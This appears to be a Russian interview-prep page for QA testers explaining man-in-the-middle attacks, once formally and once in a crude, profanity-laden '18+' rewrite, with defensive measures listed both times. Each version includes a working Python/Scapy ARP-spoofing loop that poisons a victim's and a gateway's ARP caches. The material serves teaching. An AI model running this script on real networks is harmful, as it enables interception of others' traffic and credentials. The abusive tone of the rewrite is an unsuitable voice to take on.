Перейти на PRO

Что такое атака «человек посередине» (MITM)?

Тип вопроса: Тестирование безопасности Вероятность: 10% Категория: QA Тестировщик

Ответ

Атака "человек посередине" (Man-in-the-Middle, MITM) — это тип кибератаки, при которой злоумышленник тайно перехватывает, а иногда и модифицирует коммуникацию между двумя сторонами (например, клиентом и сервером), которые считают, что общаются напрямую.

Типичный сценарий атаки:

  1. Перехват трафика: Атакующий позиционирует себя между жертвой и целевым ресурсом (например, через поддельную точку доступа Wi-Fi, ARP-спуфинг или компрометацию маршрутизатора).
  2. Дешифровка (при необходимости): Если трафик зашифрован (HTTPS), атакующий может использовать методы для подмены сертификатов.
  3. Просмотр/Изменение данных: Злоумышленник получает доступ к конфиденциальным данным (логины, пароли, платежные реквизиты) или внедряет вредоносный код.

Пример реализации ARP-спуфинга (подмены ARP-таблицы) с помощью Python и Scapy:

from scapy.all import ARP, send, getmacbyip
import time

def arp_spoof(target_ip, spoof_ip):
    """
    Отправляет поддельный ARP-ответ, чтобы "убедить" target_ip,
    что MAC-адрес spoof_ip принадлежит атакующему.
    """
    target_mac = getmacbyip(target_ip)
    # Создаём поддельный ARP-пакет: говорим target, что шлюз (spoof_ip) это мы.
    spoof_packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    send(spoof_packet, verbose=False)

# Пример вызова: перенаправляем трафик жертвы (192.168.1.100) через атакующего
while True:
    arp_spoof("192.168.1.100", "192.168.1.1")  # Жертва -> Шлюз
    arp_spoof("192.168.1.1", "192.168.1.100")  # Шлюз -> Жертва
    time.sleep(2)  # Поддерживаем атаку, периодически отправляя пакеты

Меры защиты от MITM:

  • Использование строгого шифрования: HTTPS (с HSTS), VPN, SSH (с проверкой отпечатка ключа).
  • Проверка сертификатов: Внимание к предупреждениям браузера о недействительных сертификатах.
  • Сетевые механизмы: DHCP snooping, Dynamic ARP Inspection (DAI) на коммутаторах.
  • Аутентификация на уровне канала: Например, использование WPA2/WPA3 для Wi-Fi.

Ответ 18+ 🔞

Да ты посмотри, что эти ушлые пидоры вытворяют! Сидят, сука, как пауки в сетях, и ловят твой трафик, пока ты думаешь, что просто в интернете сидишь. Это ж называется «человек посередине», а по-нашему — классический подслушивающий мудак с технической жилкой.

В чём, блядь, суть этой хуйни: Злодей, ёпта, втихаре вклинивается между тобой и тем, с кем ты общаешься. Допустим, ты пишешь своему корешу, а этот тип весь разговор читает, да ещё и может свои правки впиздюрить. И обе стороны свято верят, что общаются напрямую. Ну просто пиздец, как нагло!

Как это обычно происходит, блядь:

  1. Перехват трафика: Атакующий подсовывает тебе левую точку Wi-Fi или, допустим, через ARP-спуфинг делает так, что весь твой трафик идёт через его комп. Представь — ты думаешь, что шлёшь данные роутеру, а на деле они идут прямиком к этому хитрожопому ублюдку.
  2. Взлом шифрования (если есть): Если ты умный и используешь HTTPS, он может попробовать подсунуть тебе фейковый сертификат. А ты, дурак, нажмёшь «принять риск» и всё — он уже видит твои пароли и номера карт.
  3. Просмотр и подмена: И вот он уже, сука, сидит и читает твои логины, пароли, переписки. А может и в ответы тебе свою дрянь подмешать — вирус какой или ссылку на фишинг.

Вот, смотри, как они через ARP-спуфинг работают (на Python со Scapy):

from scapy.all import ARP, send, getmacbyip
import time

def arp_spoof(target_ip, spoof_ip):
    """
    Отправляет поддельный ARP-ответ, чтобы "убедить" target_ip,
    что MAC-адрес spoof_ip принадлежит атакующему.
    """
    target_mac = getmacbyip(target_ip)
    # Создаём поддельный ARP-пакет: говорим target, что шлюз (spoof_ip) это мы.
    spoof_packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    send(spoof_packet, verbose=False)

# Пример вызова: перенаправляем трафик жертвы (192.168.1.100) через атакующего
while True:
    arp_spoof("192.168.1.100", "192.168.1.1")  # Жертва -> Шлюз
    arp_spoof("192.168.1.1", "192.168.1.100")  # Шлюз -> Жертва
    time.sleep(2)  # Поддерживаем атаку, периодически отправляя пакеты

Видишь? Эта мартышлюшка постоянно шлёт твоему устройству и роутеру ложные ARP-ответы, типа «я — он». И они начинают верить! Трафик пошёл через злодея, а он уже радуется, как сука.

Как не стать лохом, блядь:

  • Шифруйся нахуй: Используй HTTPS (и чтобы HSTS был), нормальный VPN, SSH с проверкой отпечатков ключей. Не лезь в открытые Wi-Fi сети как последний лох.
  • Сертификаты — не просто бумажки: Если браузер орёт, что сертификат левый — не тычь в «продолжить», ёпта! Это первый звоночек, что тебя уже, возможно, разводят.
  • Сетевую защиту настрой: На нормальных свитчах есть штуки вроде DHCP snooping и Dynamic ARP Inspection. Они такие атаки отлавливают и давят, как говно.
  • Wi-Fi защищай: WPA2/WPA3, блядь, а не этот доисторический WEP, который взламывается за пять минут.

В общем, бди, дружище. Интернет — это джунгли, а в кустах сидят такие вот мудаки с ноутбуками и ждут, когда ты расслабишься. Не давай им шанса, ёпта!

© ХакСобесов, 2026
support@hacksobesov.com